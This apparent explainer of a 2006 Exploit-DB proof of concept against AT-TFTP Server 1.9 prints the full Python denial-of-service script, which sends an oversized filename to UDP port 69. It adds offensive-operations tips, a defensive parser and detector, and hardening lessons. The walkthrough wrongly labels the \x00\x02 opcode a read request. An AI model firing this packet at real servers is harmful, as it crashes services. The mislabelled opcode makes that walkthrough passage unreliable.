AT-TFTP 1.9 Filename Buffer Overflow Explained

What this paper is
This paper describes a Proof-of-Concept (PoC) exploit for a buffer overflow vulnerability in AT-TFTP Server version 1.9. The vulnerability allows remote or local attackers to potentially execute arbitrary commands or cause a Denial of Service (DoS) by sending an overly long filename in a TFTP "GET" or "PUT" request. This specific PoC focuses on demonstrating the DoS aspect.
Simple technical breakdown
The AT-TFTP Server, when handling TFTP requests, expects filenames of a certain length. If a filename longer than 227 bytes is provided in a "GET" or "PUT" request, it doesn't properly check the size. This causes the server to write data beyond the allocated buffer for the filename, overwriting adjacent memory. In this PoC, sending a filename consisting of 227 'A' characters triggers this overflow, leading to a crash (DoS) of the AT-TFTP server process.
Complete code and payload walkthrough
The provided Python script is a simple exploit that targets the buffer overflow vulnerability.
#!/usr/bin/python
# SUMMARY:
# AT-TFTP Server is a Freeware TFTP server for Windows 9x/NT/XP.
# (http://www.alliedtelesyn.co.uk/en-gb/support/downloads/tools.asp)
# It provides an implementation of the TFTPv2 protocol.
# A vulnerability has been identified in TFTP Server AT-TFTP Server v1.9, which
# could be exploited by remote or local attackers to execute arbitrary commands
# or cause a denial of service. This flaw is due to a buffer overflow error when
# handling an overly long file name (more than 227 bytes) passed to a "GET" or "PUT"
# command, which could be exploited by malicious users to compromise a vulnerable
# system or crash an affected application.
# EXPLOIT:
# Buffer Overflow (Long filename) Vulnerability Exploit
# This is just a DoS exploiting code
# Tested on Windows xp SP2
#
# Requires python and impacket
#
# Coded by Liu Qixu Of NCNIPC
import socket
import sys

host = '192.168.1.11'
port = 69

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)

filename = "A" * 227
mode = "netascii"
data = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(data, (host, port))
# milw0rm.com [2006-11-27]

Let's break down the meaningful parts:
- #!/usr/bin/python: the shebang line, telling the OS to run the script with the Python interpreter.
- Comments (# ...): context on the vulnerability, the target software, the exploit's purpose (DoS), the tested environment (Windows XP SP2) and the tools it claims to need (Python and impacket, though impacket is not actually used in this PoC).
- import socket: imports the socket module, which provides network communication in Python.
- import sys: imports the sys module, used here only to exit the script (sys.exit(1)).
- host = '192.168.1.11': the target IP address of the AT-TFTP server. This is a placeholder and would need to be changed to the actual IP of the vulnerable server.
- port = 69: the target port. TFTP listens on UDP port 69.
- try...except block for socket creation: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) creates a UDP socket; socket.AF_INET selects IPv4 and socket.SOCK_DGRAM selects UDP (datagram) transport. If socket creation fails for any reason, the except branch prints "socket() failed" and exits with sys.exit(1).
- filename = "A" * 227: the core of the exploit payload, a string of 227 repetitions of the character 'A'. This length is chosen because it is just over the buffer limit, triggering the overflow.
- mode = "netascii": the TFTP transfer mode. "netascii" is the mode used for text files.
- data = "\x00\x02" + filename + "\0" + mode + "\0": builds the UDP payload. "\x00\x02" is the TFTP opcode for a Read Request (RRQ); TFTP uses opcodes to identify the request type. filename is the crafted long filename string; "\0" is the null terminator that separates the filename from the mode in the TFTP protocol; mode is the transfer mode string; the final "\0" marks the end of the mode string.
- s.sendto(data, (host, port)): sends the constructed data packet to the target host on the specified port over the UDP socket s.
Mapping list:
- #!/usr/bin/python: script interpreter declaration.
- import socket, import sys: module imports for network and system operations.
- host = '192.168.1.11': target IP address.
- port = 69: target TFTP port.
- socket.socket(socket.AF_INET, socket.SOCK_DGRAM): UDP socket creation.
- filename = "A" * 227: payload, an overly long filename string to trigger the buffer overflow.
- mode = "netascii": TFTP transfer mode.
- "\x00\x02": TFTP Read Request (RRQ) opcode.
- "\0": null terminator for TFTP protocol fields.
- data = ...: construction of the TFTP RRQ packet.
- s.sendto(data, (host, port)): sending the crafted packet to the target.
Shellcode/Payload Segments:
This PoC does not contain explicit shellcode in the traditional sense for remote code execution. The "payload" is the crafted UDP packet designed to trigger the buffer overflow.
- Stage 1: Packet Construction: The script constructs a UDP packet that mimics a TFTP Read Request.
- \x00\x02: TFTP RRQ opcode.
- "A" * 227: the oversized filename; this is the malicious part that causes the overflow.
- \0: separator.
- "netascii": transfer mode.
- \0: end of mode.
- Stage 2: Packet Transmission: The constructed packet is sent to the target TFTP server.
- Stage 3: Buffer Overflow: Upon receiving the packet, the AT-TFTP server attempts to process the filename. Due to its excessive length, it writes beyond the allocated buffer, corrupting memory.
- Stage 4: Denial of Service: The memory corruption leads to an unhandled exception or crash within the AT-TFTP server process, resulting in a Denial of Service.
Practical details for offensive operations teams
- Required Access Level: Network access to the target host's UDP port 69. No authentication is typically required for TFTP.
- Lab Preconditions:
- A vulnerable AT-TFTP Server v1.9 instance running on a Windows machine (tested on XP SP2).
- A Python interpreter installed on the attacker's machine.
- Network connectivity between the attacker and the target.
- Tooling Assumptions:
- Python with its standard socket library.
- The paper mentions impacket, but this specific PoC does not utilize it. If aiming for code execution (beyond DoS), a more sophisticated payload and potentially impacket for network interactions might be needed.
- Execution Pitfalls:
- Incorrect Target IP/Port: The host and port variables must be accurately set.
- Firewalls: UDP port 69 might be blocked by network firewalls.
- Patching: The vulnerability might be patched in newer versions of AT-TFTP or the operating system.
- DoS vs. RCE: This PoC is strictly for DoS. Achieving Remote Code Execution (RCE) would require a more complex payload that overwrites the instruction pointer with shellcode, which is not provided here. The overflow might not be reliably controllable for RCE without further analysis and payload development.
- TFTP Server Configuration: The TFTP server must be running and accessible.
- Telemetry:
- Network: UDP traffic to port 69 on the target.
- Host: The AT-TFTP server process crashing or becoming unresponsive. Event logs on the target might show application crashes.
- Application: The AT-TFTP server service stopping or terminating unexpectedly.
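The datagram layout from the Stage 1 breakdown and the network telemetry point above are both served by one added example, written for this page and not taken from the paper or from the AT-TFTP project. It parses a TFTP read/write request the way RFC 1350 lays it out (two-byte opcode, filename, NUL, mode, NUL; RFC 1350 numbers RRQ as 1 and WRQ as 2, so the PoC's \x00\x02 parses here as a write request, the "PUT" case the paper's header also names), rejects any filename longer than an assumed limit before the field is used anywhere, and then runs that same check as a detector over constructed sample datagrams to UDP/69. The 128-byte limit, the sample addresses, the sample traffic and all function names are assumptions; the 227-byte trigger length is the paper's.

```python
"""TFTP RRQ/WRQ parser with explicit bounds checks, plus a detector over traffic.

Added example; not code from the Exploit-DB paper or from the AT-TFTP project.
Wire layout per RFC 1350:  2-byte opcode | filename | 0x00 | mode | 0x00
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

OP_RRQ = 1   # read request (GET)
OP_WRQ = 2   # write request (PUT)
VALID_MODES = {"netascii", "octet", "mail"}

# Assumed conservative limit for a hardened server and for the detection threshold.
# The paper's trigger length is 227 bytes, so this bound sits well below it.
MAX_FILENAME = 128


@dataclass
class TftpRequest:
    opcode: int
    filename: str
    mode: str


def parse_request(datagram: bytes, max_filename: int = MAX_FILENAME) -> TftpRequest:
    """Parse an RRQ/WRQ datagram; raise ValueError on anything out of bounds.

    Every field length is checked before the field is used, which is the check
    the vulnerable server lacked for the filename.
    """
    if len(datagram) < 4:
        raise ValueError("datagram too short")
    opcode = int.from_bytes(datagram[:2], "big")
    if opcode not in (OP_RRQ, OP_WRQ):
        raise ValueError("not a read/write request (opcode %d)" % opcode)
    # Exactly two NUL-terminated fields must follow the opcode: filename, mode.
    parts = datagram[2:].split(b"\x00")
    if len(parts) != 3 or parts[2] != b"":
        raise ValueError("malformed field terminators")
    raw_name, raw_mode = parts[0], parts[1]
    if not raw_name:
        raise ValueError("empty filename")
    if len(raw_name) > max_filename:
        raise ValueError("filename too long (%d > %d bytes)" % (len(raw_name), max_filename))
    try:
        mode = raw_mode.decode("ascii").lower()
        filename = raw_name.decode("ascii")
    except UnicodeDecodeError:
        raise ValueError("non-ASCII bytes in request fields")
    if mode not in VALID_MODES:
        raise ValueError("unknown mode %r" % mode)
    return TftpRequest(opcode, filename, mode)


def rejection_reason(datagram: bytes, max_filename: int = MAX_FILENAME) -> Optional[str]:
    """None if the datagram parses cleanly, otherwise the reason it was rejected."""
    try:
        parse_request(datagram, max_filename)
    except ValueError as exc:
        return str(exc)
    return None


def build_request(opcode: int, filename: bytes, mode: bytes = b"netascii") -> bytes:
    """Encode an RRQ/WRQ in RFC 1350 layout (used here only to build samples)."""
    return opcode.to_bytes(2, "big") + filename + b"\x00" + mode + b"\x00"


def inspect_datagram(src: str, dst_port: int, payload: bytes) -> Optional[str]:
    """Alert text for a suspicious request to UDP/69, else None.

    This is the logic an IDS rule for the paper's traffic pattern would encode.
    """
    if dst_port != 69:
        return None
    reason = rejection_reason(payload)
    if reason is None:
        return None
    return "ALERT src=%s udp/69 %s" % (src, reason)


def scan_traffic(records: List[Tuple[str, int, bytes]]) -> List[str]:
    """Run inspect_datagram over (src, dst_port, payload) records, keeping alerts."""
    return [a for a in (inspect_datagram(*r) for r in records) if a is not None]


# Constructed sample traffic (not captured data): source, destination port, payload.
SAMPLE_TRAFFIC = [
    ("10.0.0.5", 69, build_request(OP_RRQ, b"boot/config.txt")),
    ("10.0.0.9", 69, build_request(OP_WRQ, b"A" * 227)),            # shape of the paper's PoC
    ("10.0.0.9", 69, build_request(OP_RRQ, b"A" * 228, b"octet")),
    ("10.0.0.7", 69, b"\x00\x01" + b"no-terminator"),                # truncated request
    ("10.0.0.3", 53, b"\x00\x01" + b"A" * 300 + b"\x00octet\x00"),   # not TFTP port, ignored
]

if __name__ == "__main__":
    for alert in scan_traffic(SAMPLE_TRAFFIC):
        print(alert)
```

Run stand-alone, the script prints three alerts: the 227-byte and 228-byte filenames and the truncated request; the well-formed read of boot/config.txt and the datagram to a non-TFTP port produce none. The detector deliberately reuses the server-side parser, so the same bounds decide both what a hardened server would accept and what monitoring would flag.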
Where this was used and when
- Context: This vulnerability was identified and exploited in the context of security research and proof-of-concept development. The paper was published in 2006.
- Approximate Years/Dates: The exploit was published on November 27, 2006. The vulnerability likely existed prior to this date in AT-TFTP Server v1.9.
Defensive lessons for modern teams
- Input Validation is Crucial: Always validate the size and format of user-supplied input, especially in network services. Never trust input length.
- Secure Coding Practices: Implement bounds checking for buffer operations to prevent overflows. Use safer string manipulation functions.
- Network Segmentation and Firewalls: Restrict access to services like TFTP (UDP port 69) to only necessary internal networks or hosts.
- Regular Patching and Updates: Keep all software, including network services and operating systems, up-to-date with the latest security patches.
- Intrusion Detection/Prevention Systems (IDS/IPS): Network security devices can detect and potentially block malformed packets that attempt to exploit known vulnerabilities.
- Principle of Least Privilege: Run network services with the minimum necessary privileges to limit the impact of a compromise.
ASCII visual
This exploit is a simple client-server interaction. The diagram below shows the packet flow:

+-------------------+                          +-------------------------+
| Attacker Machine  |                          | Target AT-TFTP Server   |
| (Python Script)   |                          | (Windows XP SP2)        |
+-------------------+                          +-------------------------+
         |                                                 |
         |   UDP Packet (Port 69)                          |
         |   (RRQ with long filename)                      |
         |------------------------------------------------>|
         |                                                 |
         |                                   Buffer Overflow occurs
         |                                   in filename handling
         |                                                 |
         |                                   Process Crashes (DoS)
         |                                                 X

Source references
- PAPER ID: 2854
- PAPER TITLE: AT-TFTP 1.9 - 'Filename' Remote Buffer Overflow (PoC)
- AUTHOR: Liu Qixu
- PUBLISHED: 2006-11-27
- PAPER URL: https://www.exploit-db.com/papers/2854
- RAW URL: https://www.exploit-db.com/raw/2854